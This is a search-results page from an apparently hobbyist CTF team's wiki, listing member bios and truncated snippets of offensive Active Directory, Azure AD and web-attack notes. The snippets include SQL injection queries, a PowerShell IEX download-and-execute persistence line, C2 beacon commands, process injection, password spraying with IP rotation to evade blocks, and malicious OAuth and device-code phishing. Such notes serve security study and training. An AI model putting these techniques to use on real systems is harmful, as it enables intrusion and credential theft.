Search Results

82 total results found

ADMinions

We're a team of cybersecurity professionals who love to learn, compete, and push our limits. More than just competitors, we’re a group of friends who tackle challenges together—sharpening our skills through CTFs and real-world security research. Here is the lin...

The Team

We're little minions working on Active Directory and sometimes doing CTFs for fun

Articles

Azure AD (AAD)

ADCS - Abusing Active Directory Certificate Service

Attacks: ESC1 to ESC14 SpecterOps - Certified Pre-Owned SpecterOps - ADCS ESC13 Abuse Technique SpecterOps - ADCS ESC14 Abuse Technique HackTheBox Academy - ADCS Attacks

Cross Forest Attacks

Active Directory Domain Trust Attacks

Windows Attacks and Enumerations

Web Attacks

Active Directory Enumeration and Exploitation

HackTheBox Challenges

Notes for HTB challenges

VulnLab Machines & Chains

Notes for VulnLab machines and chains

Information Gathering

OtterSec

The Team

I like otters... a lot ʕ •ᴥ•ʔ Currently focusing on honing my AD skills and recently got into AV/EDR evasion. Find me on HackTheBox here and on VulnLab :)

serioton

The Team

I love cats, Active Directory and playing CTFs

Kerberos Attacks

Active Directory Enumeration and Exploi...

Kerberoasting Kerberoasting is an attack against service accounts that allows an attacker to perform an offline password-cracking attack against the Active Directory account associated with the service. We need a valid domain user account and password. Vulnera...

Miscellaneous

Active Directory Enumeration and Exploi...

User SID and RID In Active Directory, any group or user that Windows doesn't create has a RID of 1000 or greater. The last 8 bytes of RID determines the user's group. RID : 0x0105000000000005150000001c00d1bcd181f1492bdfc236f4010000 SID : 0x01050000000000051500...

SQL Injection

Web Attacks

Database enumeration MySQL SELECT GROUP_CONCAT(schema_name,',') FROM information_schema.schemata; SELECT GROUP_CONCAT(table_name,',') FROM information_schema.tables; SELECT GROUP_CONCAT(column_name,',') FROM information_schema.columns WHERE table_name = 'users...

Persistence

Windows Attacks and Enumerations

Persistence on Windows The commands that include execute-assembly have been executed from a Sliver beacon but can easily be used on other C2 frameworks as well with minimal changes. Task scheduler $str = 'IEX ((new-object net.webclient).downloadstring("http:...

Recon

Windows Attacks and Enumerations

Windows recon Some commands are meant to be executed from a Sliver beacon but can easily be used on other C2 frameworks as well with minimal changes. Applocker Applocker policies Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections Powersh...

Windows Local Privilege Escalation

Windows Attacks and Enumerations

SeDebugPrivilege Migrate PID to privileged process such as WinLogon using ProcessInjection to load adopt. WinLogon PID: 3488 Adopt binary: adopt.exe PS /bob> dotnet inline-execute /home/user/ProcessInjection.exe /f:raw /pid:3488 /t:1 /path:C:\Windows\Tasks\ado...

LueRader

The Team

Interested in everything to do with enterprise network security. Usually big fan of web and pwn too, but not very active lately.

pr0m0ly

The Team

Passionate about cybersecurity, specializing in Active Directory environments. CTF Player focused on Web, Forensics and Blockchain. You'll find me on platforms like HackTheBox and VulnLab!

Defense Evasion

Windows Attacks and Enumerations

Defense Evasion Useful Links Win32 API docs NTAPI Undocumented Functions Kernel-specific structures (pick the right kernel version / update) DLL download for Unhooking (download URL structure is https://msdl.microsoft.com/download/symbols/name.dll/{IMAG...

Server Side Request Forgery SSRF

Web Attacks

Definition Server-Side Request Forgery (SSRF) is a vulnerability that allows attackers to manipulate a server into making requests to internal or external resources, potentially gaining access to data and systems not directly reachable by the attacker. Bypass ...

fsharp

The Team

Hey there! I'm interested in cybersecurity and I play CTFs as a hobby. My biggest interests are in reverse engineering and forensics. You can find me on CTF Discord servers (fsharp123), GitHub (G-flat), and Twitter (currently known as X; fsharp123). Personal a...

Useful links

Azure AD (AAD)

dirkjanm.io Blog AADInternals Blog List of Managed Identities Web applications Portal.azure.com admin.exchange.microsoft.com compliance.microsoft.com security.microsoft.com Graph Explorer Graph PWSH SDK Documentation MSOnline PWSH Module docume...

Overview of Azure & M365

Azure AD (AAD)

AAD (Azure Active Directory) is an identity and access management service: it allows users and applications to access resources like VMs, storage accounts or the M365 suite. All resources are maintained inside a Tenant which represents a company (like a domain ...

Enumerate Users and Domains

Azure AD (AAD)

MS has a series of public APIs and DNS public suffixes that we can check during the enumeration phase. Enumerating with Public APIs These APIs can be used to find information about domain names, whether the domain is federated or not, if a specific user exists...

Post-exploitation Reconnaissance

Azure AD (AAD)

Enumerate AD tenant information admin roles and identify high-value targets in the network ADFS Resources Conditional access policies UAL (Unified Access Log) settings Service principal accounts (for single-factor logon) Storage accounts / key vaults To perf...

Password Spraying M365

Azure AD (AAD)

This attack is not complex as it only consists in "guessing" a user's password but there are still some precautions we want to take: Slow spraying to avoid account lockouts Rotating IPs via proxies and / or VPNs to avoid IP blacklisting and to bypass location...

OAuth 2.0 Abuse

Azure AD (AAD)

OAuth is a protocol that allows third-party applications to access services with access tokens, avoiding the disclosure of the user's credentials. What we can do as an attacker is create a malicious OAuth app to coerce users into granting the application acces...

Abusing Device Code Authentication

Azure AD (AAD)

Device Code Authentication allows compromising an AAD / M365 account just like OAuth Abuse but it's generally harder to detect / set up and doesn't require any input from the victim. The downside to this technique is that the device codes are valid for only a ...